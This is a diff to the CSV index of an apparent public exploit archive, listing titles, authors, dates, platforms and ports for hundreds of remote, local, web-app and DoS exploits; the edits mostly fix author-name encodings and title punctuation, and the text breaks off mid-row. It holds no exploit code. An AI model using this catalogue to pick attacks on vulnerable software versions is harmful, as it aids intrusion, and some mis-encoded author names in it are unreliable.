diff --git a/files.csv b/files.csv index 5daf346d7..94d2ba2f5 100755 --- a/files.csv +++ b/files.csv @@ -85,7 +85,7 @@ id,file,description,date,author,platform,type,port 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 -90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 +90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel <= 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 @@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0 -170,platforms/multiple/dos/170.c,"Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit",2004-03-26,"Rmi Denis-Courmont",multiple,dos,0 +170,platforms/multiple/dos/170.c,"Ethereal EIGRP Dissector TLV_IP_INT Long IP Remote DoS Exploit",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 171,platforms/linux/remote/171.c,"tcpdump ISAKMP Identification payload Integer Overflow Exploit",2004-04-05,Rapid7,linux,remote,0 172,platforms/windows/local/172.c,"FirstClass Desktop 7.1 - Buffer Overflow Exploit",2004-04-07,I2S-LaB,windows,local,0 173,platforms/linux/remote/173.pl,"Monit <= 4.1 - Remote Root Buffer Overflow Exploit",2004-04-09,gsicht,linux,remote,2812 @@ -315,7 +315,7 @@ id,file,description,date,author,platform,type,port 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 xterm (-xrm) Local Root Exploit",1997-05-28,"David Hedley",solaris,local,0 339,platforms/linux/local/339.c,"zgv $HOME Overflow",1997-06-20,"BeastMaster V",linux,local,0 340,platforms/linux/remote/340.c,"Linux imapd Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143 -341,platforms/solaris/local/341.c,"Solaris 2.4 - passwd, yppasswd and nispasswd Overflow Exploits",1997-07-12,"Cristian Schipor",solaris,local,0 +341,platforms/solaris/local/341.c,"Solaris 2.4 - passwd & yppasswd &nispasswd Overflow Exploits",1997-07-12,"Cristian Schipor",solaris,local,0 343,platforms/bsd/dos/343.c,"TCP SYN Denial of Service Exploit (bang.c)",2002-09-17,Nebunu,bsd,dos,0 345,platforms/windows/dos/345.c,"UDP Stress Tester Denial of Service Exploit",2002-09-10,Cys,windows,dos,0 346,platforms/linux/remote/346.c,"Solaris /bin/login Remote Root Exploit (SPARC/x86)",2001-12-20,Teso,linux,remote,23 @@ -352,7 +352,7 @@ id,file,description,date,author,platform,type,port 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,N/A,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 -381,platforms/windows/local/381.c,"Serv-U 3x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 +381,platforms/windows/local/381.c,"Serv-U 3x - 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC <= 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337 384,platforms/php/webapps/384.txt,"PHP (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 @@ -400,10 +400,10 @@ id,file,description,date,author,platform,type,port 431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM ""Away"" Message Remote Exploit",2004-09-02,"John Bissell",windows,remote,0 432,platforms/bsd/remote/432.c,"Courier-IMAP <= 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 433,platforms/multiple/dos/433.c,"Call of Duty <= 1.4 - Denial of Service Exploit",2004-09-05,"Luigi Auriemma",multiple,dos,0 -434,platforms/linux/local/434.sh,"CDRDAO Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 +434,platforms/linux/local/434.sh,"CDRDAO Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Remote Privilege Escalation",2004-09-08,mantra,php,webapps,0 -437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 - Remote USER Directive Exploit (Private Version)",2004-09-09,Nebunu,linux,remote,504 +437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 438,platforms/linux/local/438.c,"cdrecord $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow Exploit",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service Exploit",2004-09-13,str0ke,windows,dos,0 @@ -493,10 +493,8 @@ id,file,description,date,author,platform,type,port 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 -643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 -646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 647,platforms/php/webapps/647.pl,"phpBB <= 2.0.10 - Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 648,platforms/php/webapps/648.pl,"Invision Power Board 2.0.0 - 2.0.2 - SQL Injection Exploit",2004-11-22,RusH,php,webapps,0 649,platforms/windows/dos/649.c,"wodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 @@ -542,7 +540,7 @@ id,file,description,date,author,platform,type,port 694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope <= 15.5 Symlink Vulnerability Exploit",2004-12-17,Gangstuck,linux,local,0 697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0 -698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0 +698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0 700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0 701,platforms/aix/local/701.sh,"AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution",2004-12-21,cees-bart,aix,local,0 @@ -741,6 +739,7 @@ id,file,description,date,author,platform,type,port 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x - 7.6 Top module Remote SQL Injection Exploit (working)",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 - Remote Command Execution (1)",2005-04-08,GreenwooD,cgi,webapps,0 +30090,platforms/php/webapps/30090.txt,"phpPgAdmin <= 4.1.1 Redirect.PHP Cross-Site Scripting Vulnerability",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 @@ -993,7 +992,7 @@ id,file,description,date,author,platform,type,port 1193,platforms/windows/remote/1193.pl,"Free SMTP Server <= 2.2 Spam Filter Vulnerability",2005-09-02,basher13,windows,remote,0 1194,platforms/cgi/webapps/1194.c,"man2web <= 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 -1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 +1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 - Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 - Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 @@ -1002,7 +1001,7 @@ id,file,description,date,author,platform,type,port 1204,platforms/multiple/dos/1204.html,"Mozilla Products (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum <= 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily <= 1.4.0 - SQL Injection Exploit",2005-03-27,basher13,php,webapps,0 -1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 +1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 1210,platforms/windows/remote/1210.pm,"WebAdmin <= 2.0.4 USER Buffer Overflow Exploit",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool <= 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control <= 1.12 - Remote Denial of Service Exploit",2005-09-11,basher13,windows,dos,0 @@ -1143,7 +1142,7 @@ id,file,description,date,author,platform,type,port 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service Exploit",2005-12-14,Kozan,windows,dos,0 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6.0 (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 1373,platforms/php/webapps/1373.php,"Limbo <= 1.0.4.2 _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 -1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 +1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0 @@ -1601,7 +1600,7 @@ id,file,description,date,author,platform,type,port 1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability",2006-06-08,Kacper,php,webapps,0 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 -1894,platforms/linux/dos/1894.py,"0verkill 0.16 (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 +1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 1895,platforms/php/webapps/1895.txt,"empris <= r20020923 (phormationdir) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0 1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 (dir[data]) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0 1897,platforms/php/webapps/1897.txt,"phpOnDirectory <= 1.0 - Remote File Include Vulnerabilities",2006-06-10,Kacper,php,webapps,0 @@ -2917,7 +2916,7 @@ id,file,description,date,author,platform,type,port 3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 (common.php inc_path) Remote File Include Vulnerability",2007-02-01,GoLd_M,php,webapps,0 3248,platforms/windows/dos/3248.rb,"CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit",2007-02-01,Shirkdog,windows,dos,0 3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability",2007-02-01,GoLd_M,php,webapps,0 -3250,platforms/php/webapps/3250.txt,"Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln",2007-02-01,"laurent gaffié ",php,webapps,0 +3250,platforms/php/webapps/3250.txt,"Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln",2007-02-01,"laurent gaffié ",php,webapps,0 3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability",2007-02-02,"ThE dE@Th",php,webapps,0 3252,platforms/php/webapps/3252.txt,"EQdkp <= 1.3.1 (Referer Spoof) Remote Database Backup Vulnerability",2007-02-02,Eight10,php,webapps,0 3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 (poll.php root_path) Remote File Include Vulnerability",2007-02-02,"Mehmet Ince",php,webapps,0 @@ -3091,7 +3090,7 @@ id,file,description,date,author,platform,type,port 3424,platforms/multiple/local/3424.php,"PHP <= 5.2.1 substr_compare() Information Leak Exploit",2007-03-07,"Stefan Esser",multiple,local,0 3425,platforms/multiple/remote/3425.txt,"mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability",2007-03-07,"Stefan Esser",multiple,remote,0 3426,platforms/linux/local/3426.php,"PHP < 4.4.5 / 5.2.1 (shmop Functions) Local Code Execution Exploit",2007-03-07,"Stefan Esser",linux,local,0 -3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 +3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0 3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0 @@ -3504,7 +3503,7 @@ id,file,description,date,author,platform,type,port 3848,platforms/php/webapps/3848.txt,"workbench 0.11 (header.php path) Remote File Inclusion Vulnerability",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - Remote SQL Injection Vulnerability",2007-05-04,"Mehmet Ince",php,webapps,0 3850,platforms/php/webapps/3850.php,"RunCMS <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 -3851,platforms/multiple/dos/3851.c,"Multiple vendors ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 +3851,platforms/multiple/dos/3851.c,"Multiple vendors ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 3852,platforms/php/webapps/3852.txt,"PMECMS <= 1.0 config[pathMod] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS <= 0.9.2 system[path] Remote File Inclusion Vulnerabilities",2007-05-04,GoLd_M,php,webapps,0 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability",2007-05-04,kezzap66345,php,webapps,0 @@ -3644,7 +3643,7 @@ id,file,description,date,author,platform,type,port 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0 -3993,platforms/windows/remote/3993.html,"Internet Explorer 6 / Ademco, co., ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 +3993,platforms/windows/remote/3993.html,"Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80 @@ -3738,7 +3737,7 @@ id,file,description,date,author,platform,type,port 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 (htmledit.php) Remote File Inclusion Vulnerability",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities",2007-06-22,GoLd_M,php,webapps,0 -4092,platforms/php/webapps/4092.txt,"netclassifieds (sql/xss/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 +4092,platforms/php/webapps/4092.txt,"netclassifieds (sql/xss/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 (index.php ID) Remote SQL Injection Vulnerability",2007-06-24,t0pP8uZz,php,webapps,0 @@ -3746,7 +3745,7 @@ id,file,description,date,author,platform,type,port 4097,platforms/php/webapps/4097.txt,"dagger Web engine <= 23jan2007 - Remote File Inclusion Vulnerability",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload Vulnerability",2007-06-24,g00ns,php,webapps,0 -4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability",2007-06-24,"laurent gaffié ",php,webapps,0 +4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability",2007-06-24,"laurent gaffié ",php,webapps,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 - ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 (sql/XSS) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 @@ -3810,7 +3809,7 @@ id,file,description,date,author,platform,type,port 4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 4164,platforms/php/webapps/4164.txt,"Aigaion <= 1.3.3 (topic topic_id) Remote SQL Injection Vulnerability",2007-07-09,CypherXero,php,webapps,0 -4165,platforms/windows/local/4165.c,"WinPcap 4.0 NPF.SYS Privilege Elevation Vulnerability PoC Exploit",2007-07-10,"Mario Ballano Bárcena",windows,local,0 +4165,platforms/windows/local/4165.c,"WinPcap 4.0 NPF.SYS Privilege Elevation Vulnerability PoC Exploit",2007-07-10,"Mario Ballano Bárcena",windows,local,0 4166,platforms/php/webapps/4166.txt,"vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability",2007-07-10,t0pP8uZz,php,webapps,0 4167,platforms/php/webapps/4167.txt,"OpenLD <= 1.2.2 (index.php id) Remote SQL Injection Vulnerability",2007-07-10,CypherXero,php,webapps,0 4168,platforms/windows/dos/4168.vbs,"Sun Java WebStart JNLP Stack Buffer Overflow Exploit PoC",2007-07-10,ZhenHan.Liu,windows,dos,0 @@ -4705,7 +4704,7 @@ id,file,description,date,author,platform,type,port 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities",2008-02-06,Trancek,php,webapps,0 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 -5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit",2008-02-06,F,php,webapps,0 +5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit",2008-02-06,F,php,webapps,0 5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - (link_id) SQL Injection Vulnerability",2008-02-06,you_kn0w,php,webapps,0 5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability",2008-02-06,Crackers_Child,php,webapps,0 5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads Remote SQL Injection Vulnerability",2008-02-06,S@BUN,php,webapps,0 @@ -4720,7 +4719,7 @@ id,file,description,date,author,platform,type,port 5082,platforms/php/webapps/5082.txt,"PowerNews (Newsscript) 2.5.6 - Local File Inclusion Vulnerabilities",2008-02-08,DSecRG,php,webapps,0 5083,platforms/php/webapps/5083.txt,"Joomla Component NeoGallery 1.1 - SQL Injection Vulnerability",2008-02-08,S@BUN,php,webapps,0 5084,platforms/php/webapps/5084.txt,"Mambo Component com_gallery Remote SQL Injection Vulnerability",2008-02-08,S@BUN,php,webapps,0 -5085,platforms/windows/dos/5085.txt,"jetAudio <= 7.0.5 - (.ASX) Remote Stack Overflow Exploit PoC",2008-02-08,"laurent gaffié ",windows,dos,0 +5085,platforms/windows/dos/5085.txt,"jetAudio <= 7.0.5 - (.ASX) Remote Stack Overflow Exploit PoC",2008-02-08,"laurent gaffié ",windows,dos,0 5086,platforms/windows/dos/5086.html,"ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow PoC",2008-02-08,Trancek,windows,dos,0 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit",2008-02-09,rgod,windows,remote,0 5088,platforms/php/webapps/5088.py,"Limbo CMS <= 1.0.4.2 Cuid cookie Blind SQL Injection Exploit",2008-02-09,The:Paradox,php,webapps,0 @@ -4745,7 +4744,7 @@ id,file,description,date,author,platform,type,port 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 -5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 +5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 @@ -5356,7 +5355,7 @@ id,file,description,date,author,platform,type,port 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX Remote Download & Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection Exploit",2008-06-03,His0k4,php,webapps,0 -5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script Code Execution Vulnerability",2008-06-03,JIKO,php,webapps,0 +5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution Vulnerability",2008-06-03,JIKO,php,webapps,0 5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader <= 1.2.1.a - BlindSQL Injection Exploit",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 @@ -5845,7 +5844,7 @@ id,file,description,date,author,platform,type,port 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 